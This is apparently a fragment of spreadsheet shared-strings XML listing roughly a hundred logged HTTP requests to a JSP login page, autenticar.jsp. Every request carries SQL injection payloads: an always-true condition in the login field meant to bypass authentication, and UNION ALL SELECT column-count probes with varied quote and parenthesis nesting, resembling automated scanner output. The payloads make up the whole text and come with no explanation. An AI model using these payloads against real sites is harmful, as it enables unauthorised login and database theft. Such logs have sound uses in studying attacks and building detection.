    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7629,7629,7629,7629,7629,7629,7629,7629,7629,7629,7629,7629,7629,7629,7629--and(((1553=1553&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669,3669--and(((5469=5469&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674,4674--and(((1450=1450&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483--and(((3737=3737&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222,5222--and(((9361=9361&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865,1865--and(((3860=3860&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect99,99,99,99,99,99,99,99,99,99,99--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597,1597--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6232,6232,6232,6232,6232,6232,6232,6232,6232,6232,6232,6232,6232,6232,6232--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885,8885--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150,1150--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect295,295,295,295,295,295,295,295,295,295,295,295,295,295,295,295,295,295--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870,6870--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917,5917--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2700,2700,2700,2700,2700,2700,2700,2700,2700,2700,2700--and('prga'='prga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6407,6407,6407,6407,6407,6407,6407,6407,6407,6407,6407,6407--and('cuhx'='cuhx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249,1249--and('uhfb'='uhfb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect925,925,925,925,925,925,925,925,925,925,925,925,925,925--and('ncuz'='ncuz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect155,155,155,155,155,155,155,155,155,155,155,155,155,155,155--and('bbje'='bbje&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414--and('jlll'='jlll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383,4383--and('nnub'='nnub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682,9682--and('pnuk'='pnuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291,2291--and('aeqk'='aeqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986,4986--and('wdjd'='wdjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6758,6758,6758,6758,6758,6758,6758,6758,6758,6758,6758--and(('ghtr'='ghtr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5872,5872,5872,5872,5872,5872,5872,5872,5872,5872,5872,5872--and(('fiog'='fiog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6853,6853,6853,6853,6853,6853,6853,6853,6853,6853,6853,6853,6853--and(('jbih'='jbih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8264,8264,8264,8264,8264,8264,8264,8264,8264,8264,8264,8264,8264,8264--and(('yfca'='yfca&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2741,2741,2741,2741,2741,2741,2741,2741,2741,2741,2741,2741,2741,2741,2741--and(('aspj'='aspj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501,7501--and(('huro'='huro&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359,3359--and(('vbdh'='vbdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450,1450--and(('cevb'='cevb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833,8833--and(('wcra'='wcra&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123--and(('tfsh'='tfsh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6454,6454,6454,6454,6454,6454,6454,6454,6454,6454,6454--and((('xuxd'='xuxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8214,8214,8214,8214,8214,8214,8214,8214,8214,8214,8214,8214--and((('rctx'='rctx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5315,5315,5315,5315,5315,5315,5315,5315,5315,5315,5315,5315,5315--and((('eetd'='eetd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8171,8171,8171,8171,8171,8171,8171,8171,8171,8171,8171,8171,8171,8171--and((('frsz'='frsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3204,3204,3204,3204,3204,3204,3204,3204,3204,3204,3204,3204,3204,3204,3204--and((('tfez'='tfez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109,6109--and((('trhq'='trhq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697,9697--and((('kdqq'='kdqq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155,7155--and((('igef'='igef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323,2323--and((('iofr'='iofr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250,1250--and((('onte'='onte&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730--and'vztk'='vztk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407--and'byzl'='byzl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9215,9215,9215,9215,9215,9215,9215,9215,9215,9215,9215,9215,9215--and'awce'='awce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860--and'bmyz'='bmyz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256--and'bijx'='bijx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081,9081--and'pfys'='pfys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353,8353--and'xzwd'='xzwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233--and'gywd'='gywd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125,9125--and'zgmm'='zgmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649,1649--and'krhi'='krhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818--and('fxae'like'fxae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768--and('lqaj'like'lqaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9814,9814,9814,9814,9814,9814,9814,9814,9814,9814,9814,9814,9814--and('fngj'like'fngj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7440,7440,7440,7440,7440,7440,7440,7440,7440,7440,7440,7440,7440,7440--and('knta'like'knta&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8750,8750,8750,8750,8750,8750,8750,8750,8750,8750,8750,8750,8750,8750,8750--and('moau'like'moau&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343,3343--and('izgr'like'izgr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938,3938--and('mlpp'like'mlpp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819--and('odfz'like'odfz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566,5566--and('kyqp'like'kyqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153,3153--and('ftid'like'ftid&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1921,1921,1921,1921,1921,1921,1921,1921,1921,1921,1921--and(('xdib'like'xdib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect123,123,123,123,123,123,123,123,123,123,123,123--and(('vpvv'like'vpvv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911--and(('zrto'like'zrto&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873--and(('jgjc'like'jgjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667--and(('yerc'like'yerc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307--and(('vwed'like'vwed&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487,2487--and(('wukv'like'wukv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391--and(('qeft'like'qeft&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142,6142--and(('alhe'like'alhe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721,3721--and(('koqb'like'koqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3475,3475,3475,3475,3475,3475,3475,3475,3475,3475,3475--and((('atyi'like'atyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1642,1642,1642,1642,1642,1642,1642,1642,1642,1642,1642,1642--and((('hphc'like'hphc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7626,7626,7626,7626,7626,7626,7626,7626,7626,7626,7626,7626,7626--and((('ctpr'like'ctpr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415,8415--and((('vgsh'like'vgsh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6492,6492,6492,6492,6492,6492,6492,6492,6492,6492,6492,6492,6492,6492,6492--and((('jhvz'like'jhvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026--and((('mzej'like'mzej&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486,1486--and((('zwst'like'zwst&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225--and((('pqgi'like'pqgi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122--and((('nthr'like'nthr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590--and((('vrro'like'vrro&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884--and'gwco'like'gwco&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1368,1368,1368,1368,1368,1368,1368,1368,1368,1368,1368,1368--and'lfqc'like'lfqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect134,134,134,134,134,134,134,134,134,134,134,134,134--and'jiyy'like'jiyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect897,897,897,897,897,897,897,897,897,897,897,897,897,897--and'vjqz'like'vjqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3138,3138,3138,3138,3138,3138,3138,3138,3138,3138,3138,3138,3138,3138,3138--and'tbcm'like'tbcm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951,9951--and'pdwk'like'pdwk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680,5680--and'kkao'like'kkao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959,6959--and'jfvr'like'jfvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835--and'jnrm'like'jnrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067,6067--and'vrnv'like'vrnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1569,1569,1569,1569,1569,1569,1569,1569,1569,1569,1569--and("xcdv"="xcdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4619,4619,4619,4619,4619,4619,4619,4619,4619,4619,4619,4619--and("dews"="dews&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1338,1338,1338,1338,1338,1338,1338,1338,1338,1338,1338,1338,1338--and("drjd"="drjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7814,7814,7814,7814,7814,7814,7814,7814,7814,7814,7814,7814,7814,7814--and("paaa"="paaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8256,8256,8256,8256,8256,8256,8256,8256,8256,8256,8256,8256,8256,8256,8256--and("uvno"="uvno&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454,5454--and("ngzk"="ngzk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520,4520--and("ipho"="ipho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209,4209--and("avfn"="avfn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089,5089--and("vmjr"="vmjr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785,4785--and("npme"="npme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4,4,4,4,4,4,4,4,4,4,4--and(("guaq"="guaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect639,639,639,639,639,639,639,639,639,639,639,639--and(("gyim"="gyim&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918,1918--and(("njsm"="njsm&amp;modo=entrar</t>
  </si>
  <si>
